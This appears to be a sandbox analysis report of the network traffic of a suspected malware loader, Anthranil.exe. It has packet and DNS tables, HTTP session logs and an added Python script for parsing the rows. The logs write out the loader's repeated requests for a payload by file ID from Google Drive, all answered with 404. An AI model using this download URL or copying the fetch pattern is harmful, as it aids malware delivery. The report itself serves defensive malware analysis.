Jan 11, 2025 05:30:08.516295910 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.516812086 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.559365034 CET  443          49330      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:08.896083117 CET  443          49330      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:08.896223068 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.896292925 CET  443          49330      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:08.896409988 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.896435022 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.896490097 CET  443          49330      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:08.896558046 CET  49330        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:08.912180901 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:08.912237883 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:08.912322998 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:08.912642002 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:08.912666082 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:09.566281080 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:09.566483974 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:09.567241907 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:09.567255020 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:09.567722082 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:09.567728043 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.000190973 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.000269890 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.000305891 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:10.000345945 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.000353098 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:10.000354052 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.000412941 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:10.001065969 CET  49331        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:10.001082897 CET  443          49331      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:10.131835938 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.131889105 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.131984949 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.132410049 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.132427931 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.764054060 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.764230967 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.764807940 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.764875889 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.769570112 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.769582987 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.769859076 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:10.770020962 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.770808935 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:10.815327883 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:11.149686098 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:11.149763107 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:11.149785995 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:11.149827957 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:11.149988890 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:11.150029898 CET  443          49332      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:11.150089025 CET  49332        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:11.165193081 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.165244102 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:11.165350914 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.165560961 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.165570021 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:11.818435907 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:11.818509102 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.819108009 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.819123030 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:11.819299936 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:11.819307089 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.269650936 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.269715071 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.269754887 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:12.269773006 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.269782066 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:12.269783020 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.269821882 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:12.269840002 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:12.270473957 CET  49333        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:12.270488977 CET  443          49333      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:12.399990082 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:12.400019884 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:12.400805950 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:12.400805950 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:12.400844097 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.038872957 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.039120913 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.039658070 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.040796041 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.043344021 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.043354034 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.043591976 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.044372082 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.044372082 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.087321043 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.433527946 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.433820009 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.433845997 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.433916092 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.433962107 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.433996916 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.434140921 CET  443          49334      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:13.434199095 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.434215069 CET  49334        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:13.453624964 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:13.453654051 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:13.453762054 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:13.454035997 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:13.454047918 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.102565050 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.105098009 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.109389067 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.109395981 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.110191107 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.110196114 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.524573088 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.524637938 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.524677038 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.524677038 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.524692059 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.524702072 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.524962902 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.525760889 CET  49335        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:14.525769949 CET  443          49335      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:14.647464037 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:14.647521973 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:14.647619009 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:14.647953033 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:14.647963047 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.314094067 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.314162016 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.316044092 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.316095114 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.318131924 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.318147898 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.318418026 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.318464041 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.318811893 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.359329939 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.712903023 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.712982893 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.713011026 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.713057995 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.713152885 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.713200092 CET  443          49336      216.58.206.46    192.168.2.4
Jan 11, 2025 05:30:15.713253021 CET  49336        443        192.168.2.4      216.58.206.46
Jan 11, 2025 05:30:15.728729963 CET  49337        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:15.728776932 CET  443          49337      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:15.728960991 CET  49337        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:15.729134083 CET  49337        443        192.168.2.4      142.250.185.129
Jan 11, 2025 05:30:15.729149103 CET  443          49337      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:16.388039112 CET  443          49337      142.250.185.129  192.168.2.4
Jan 11, 2025 05:30:16.388159990 CET  49337        443        192.168.2.4      142.250.185.129
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 11, 2025 05:28:54.855712891 CET  53           62495      162.159.36.2     192.168.2.4
Jan 11, 2025 05:28:55.680970907 CET  53           58571      1.1.1.1          192.168.2.4
Jan 11, 2025 05:29:31.168807030 CET  62807        53         192.168.2.4      1.1.1.1
Jan 11, 2025 05:29:31.175471067 CET  53           62807      1.1.1.1          192.168.2.4
Jan 11, 2025 05:29:32.282839060 CET  60117        53         192.168.2.4      1.1.1.1
Jan 11, 2025 05:29:32.289963007 CET  53           60117      1.1.1.1          192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
Jan 11, 2025 05:29:31.168807030 CET  192.168.2.4  1.1.1.1  0xb59     Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
Jan 11, 2025 05:29:32.282839060 CET  192.168.2.4  1.1.1.1  0x4318    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                          CName  Address          Type            Class        DNS over HTTPS
Jan 11, 2025 05:29:31.175471067 CET  1.1.1.1      192.168.2.4  0xb59     No error (0)  drive.google.com              -      216.58.206.46    A (IP address)  IN (0x0001)  false
Jan 11, 2025 05:29:32.289963007 CET  1.1.1.1      192.168.2.4  0x4318    No error (0)  drive.usercontent.google.com  -      142.250.185.129  A (IP address)  IN (0x0001)  false
• drive.google.com
• drive.usercontent.google.com
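The packet and DNS rows in this report are printed with their columns run together, which makes them awkward to grep or to feed into a triage script. The Python below is an added example, not Joe Sandbox code: it parses rows in exactly that flattened form, resolves peer addresses through the DNS-answer rows, and counts distinct client connections per host. LOCAL_IP (the sandbox client address that appears in every row) and SERVICE_PORTS are assumptions used to pick the one consistent split of the glued-together ports and addresses; the sample rows embedded in the script are copied from this report. Run over the full TCP table it shows the loader opening a fresh TLS connection roughly every second, alternating between drive.google.com and drive.usercontent.google.com (client ports 49327 to 49337), which is consistent with the 303 redirect recorded in the HTTP section being followed repeatedly rather than one long download.

```python
# Parser for the flattened packet rows of a Joe Sandbox network table.
# Added example for this report page, not Joe Sandbox code. The row layout
# (timestamp, then source port, destination port, source IP and destination IP
# run together with no separators) is the one printed on this page. LOCAL_IP and
# SERVICE_PORTS are assumptions used to resolve the ambiguity that creates.
import re
from dataclasses import dataclass

LOCAL_IP = "192.168.2.4"        # assumption: the sandbox client address seen in every row
SERVICE_PORTS = {53, 80, 443}   # assumption: the only server ports expected in this capture
EPHEMERAL_MIN = 49152           # start of the Windows dynamic client port range

_ROW = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<rest>[\d.]+)$")
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# DNS-answer rows read "...No error (0)<name><address>A (IP address)..."
_DNS_A = re.compile(r"No error \(0\)(?P<name>[A-Za-z][\w.-]*?)(?P<ip>\d{1,3}(?:\.\d{1,3}){3})A \(IP address\)")


@dataclass(frozen=True)
class Packet:
    ts: str
    sport: int
    dport: int
    sip: str
    dip: str


def _valid_ip(s):
    return bool(_IPV4.match(s)) and all(int(o) <= 255 for o in s.split("."))


def _plausible_ports(a, b):
    # Exactly one side is a known service port and the other a client ephemeral port.
    return (a in SERVICE_PORTS and b >= EPHEMERAL_MIN) or (b in SERVICE_PORTS and a >= EPHEMERAL_MIN)


def parse_row(line):
    """Split one flattened row into its five fields; fail loudly unless the split is unique."""
    m = _ROW.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    ts, rest = m.group("ts"), m.group("rest")
    found = set()
    for a in range(1, 6):                       # digits in the source port
        for b in range(1, 6):                   # digits in the destination port
            head, ips = rest[:a + b], rest[a + b:]
            if len(head) < a + b or not head.isdigit():
                continue
            sport, dport = int(head[:a]), int(head[a:])
            if max(sport, dport) > 65535 or not _plausible_ports(sport, dport):
                continue
            for j in range(7, len(ips) - 6):    # the shortest IPv4 text is 7 chars
                sip, dip = ips[:j], ips[j:]
                if _valid_ip(sip) and _valid_ip(dip) and LOCAL_IP in (sip, dip):
                    found.add((sport, dport, sip, dip))
    if len(found) != 1:
        raise ValueError(f"ambiguous or unparsable row {line!r}: {sorted(found)}")
    return Packet(ts, *found.pop())


def dns_map(answer_rows):
    """Map each answered address to the name that was queried for it."""
    names = {}
    for row in answer_rows:
        m = _DNS_A.search(row)
        if m:
            names[m.group("ip")] = m.group("name")
    return names


def connections_per_host(packet_rows, answer_rows):
    """Count distinct client connections (by client port) per (host, service port)."""
    names = dns_map(answer_rows)
    seen = {}
    for line in packet_rows:
        p = parse_row(line)
        if p.sip == LOCAL_IP:          # client -> server
            peer, cport, svc = p.dip, p.sport, p.dport
        else:                          # server -> client
            peer, cport, svc = p.sip, p.dport, p.sport
        seen.setdefault((names.get(peer, peer), svc), set()).add(cport)
    return {k: len(v) for k, v in seen.items()}


# Rows copied verbatim from this report's TCP, UDP and DNS-answer tables.
SAMPLE_PACKETS = [
    "Jan 11, 2025 05:30:05.560081959 CET49327443192.168.2.4142.250.185.129",
    "Jan 11, 2025 05:30:05.560647964 CET44349327142.250.185.129192.168.2.4",
    "Jan 11, 2025 05:30:05.694427967 CET49328443192.168.2.4216.58.206.46",
    "Jan 11, 2025 05:30:06.723098993 CET49329443192.168.2.4142.250.185.129",
    "Jan 11, 2025 05:30:07.882226944 CET49330443192.168.2.4216.58.206.46",
    "Jan 11, 2025 05:28:54.855712891 CET5362495162.159.36.2192.168.2.4",
    "Jan 11, 2025 05:29:31.168807030 CET6280753192.168.2.41.1.1.1",
    "Jan 11, 2025 05:29:31.175471067 CET53628071.1.1.1192.168.2.4",
]
SAMPLE_DNS = [
    "Jan 11, 2025 05:29:31.175471067 CET1.1.1.1192.168.2.40xb59No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false",
    "Jan 11, 2025 05:29:32.289963007 CET1.1.1.1192.168.2.40x4318No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false",
]

if __name__ == "__main__":
    for (host, svc), n in sorted(connections_per_host(SAMPLE_PACKETS, SAMPLE_DNS).items()):
        print(f"{host}:{svc}  {n} connection(s)")
```

The parser refuses any row for which more than one split survives the port and address constraints, so a row from a capture with a different client address or an unexpected service port raises instead of silently producing wrong fields; adjust LOCAL_IP and SERVICE_PORTS for another report before trusting the counts.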
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49202        216.58.206.46   443               6660  C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp                Bytes transferred  Direction  Data
2025-01-11 04:29:31 UTC  216                OUT        GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
2025-01-11 04:29:32 UTC  1920               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:32 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Security-Policy: script-src 'nonce-3mCk-j7kfvW5UloDThB8jg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49209 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:32 UTC | 258 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
2025-01-11 04:29:33 UTC | 2223 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgTBooCx_HrtJC3dg5lWi0qpxqYt1SJrNXd72GCuoigbkGjPBUDAxsHkQUQpyZECnBog
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:33 GMT
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-wFy2sGQAm2wSFVrYWoRwbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Content-Length: 1652
    Server: UploadServer
    Set-Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb; expires=Sun, 13-Jul-2025 04:29:33 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-01-11 04:29:33 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="akTdbR0ZWbeOFZ0dTcyElw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49218 | 216.58.206.46 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:34 UTC | 422 | OUT | GET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:34 UTC | 1920 | IN | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Sat, 11 Jan 2025 04:29:34 GMT
    Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-Xc3cbWlZ5zyHKAFWmgqeoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49226 | 142.250.185.129 | 443 | 6660 | C:\Users\user\AppData\Local\Temp\Anthranil.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 04:29:35 UTC | 464 | OUT | GET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
2025-01-11 04:29:35 UTC | 1851 | IN | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFIdbgRzeassAPrPqTtDI0EaN8RC2ufu6O8jkL6XiWWcIWXfkChYAV2RGftzfisi6M0ihpBrV-sZs4U
    Content-Type: text/html; charset=utf-8
